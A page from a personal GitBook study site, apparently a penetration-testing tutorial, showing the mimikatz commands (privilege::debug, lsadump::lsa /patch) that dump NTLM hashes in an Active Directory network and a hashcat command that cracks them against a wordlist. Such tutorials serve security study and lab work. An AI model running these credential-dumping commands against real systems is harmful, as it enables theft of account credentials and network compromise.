🙌Welcome!
CyberSecurity
- Penetration Testing
- Blue Teaming
DevOps
- Infrastructure as a Code (IaC)
  - Ansible
    1. Playbooks
    2. Modules
    3. Inventory
    4. Roles
    5. Ansible Tower
  - Terraform
    1. Overview
    2. Modify Resources
    3. Delete Resources
    4. Reference Resources
    5. Terraform Files
    6. Terraform State Commands
    7. Terraform Output
    8. Target Resources
    9. Terraform Variables
    10. Expressions + Functions
    11. Meta-Arguments
    12. Modules
    13. Managing Multiple Environments
    14. Testing Terraform Code
    15. Final Thoughts
- Orchestration
  - Kubernetes
    1. Main K8s Components
    2. K8s Architecture
    3. Minikube & Kubectl
    4. YAML Configuration File
    5. K8s Namespaces
    6. K8s Ingress
    7. Helm - Package Manager of K8s
    8. K8 Volumes
    9. K8 StatefulSet
    10. K8 Services
Development

Powered by GitBook

On this page

Introduction
Dump Hashes w/ mimikatz
Crack those hashes w/ hashcat

Dumping Hashes with mimikatz

PreviousEnumeration with Bloodhound (GUI)NextGolden Ticket Attacks with mimikatz

Last updated 1 year ago

Introduction

Mimikatz is a very popular and powerful post-exploitation tool mainly used for dumping user credentials inside of a active directory network

We'll be focusing on dumping the NTLM hashes with mimikatz and then cracking those hashes using hashcat

Dump Hashes w/ mimikatz

cd Downloads && mimikatz.exe this will cd into the directory that mimikatz is kept as well as run the mimikatz binary
privilege::debug ensure that the output is "Privilege '20' ok" - This ensures that you're running mimikatz as an administrator; if you don't run mimikatz as an administrator, mimikatz will not run properly
lsadump::lsa /patch Dump those hashes!

Crack those hashes w/ hashcat

hashcat -m 1000 <hash> rockyou.txt